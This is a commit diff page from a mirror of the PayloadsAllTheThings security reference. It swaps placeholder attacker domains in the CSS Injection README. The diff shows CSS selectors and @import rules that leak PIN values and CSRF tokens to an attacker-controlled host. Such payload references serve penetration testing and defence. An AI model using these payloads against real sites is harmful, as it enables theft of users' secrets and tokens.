gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-04-28 11:33:06 -07:00
Code Issues Packages Projects Releases Wiki Activity

Normalize commands, callbacks and references

Browse Source
This commit is contained in:
Swissky
2026-04-22 15:03:31 +02:00
parent a79b1f5692
commit d4e6eda4ad
17 changed files with 114 additions and 114 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
CSS Injection/README.md
View File

@@ -47,7 +47,7 @@ input[value^="TOKEN_012"] {
```css
input[name="pin"][value="1234"] {
background: url(https://attacker.com/log?pin=1234);
background: url(https://[ATTACKER.DOMAIN.TLD]/log?pin=1234);
}
```
@@ -57,7 +57,7 @@ input[name="pin"][value="1234"] {
```css
input[name="csrf-token"][value^="a"] + input {
background: url(https://example.com?q=a)
background: url(https://[ATTACKER.DOMAIN.TLD]/?q=a)
}
```
@@ -76,8 +76,8 @@ div:has(input[value="1337"]) {
This technique is known as **Blind CSS Exfiltration**. It relies on importing external stylesheets to trigger callbacks.
```html
<style>@import url(http://attacker.com/staging?len=32);</style>
<style>@import'//YOUR-PAYLOAD.oastify.com'</style>
<style>@import url(http://[ATTACKER.DOMAIN.TLD]/staging?len=32);</style>
<style>@import'//[ATTACKER.DOMAIN.TLD]'</style>
```
Frames do not always need to be reloaded to reevaluate CSS. The `@import` rule allows for latency; the browser will process the import and apply the new styles.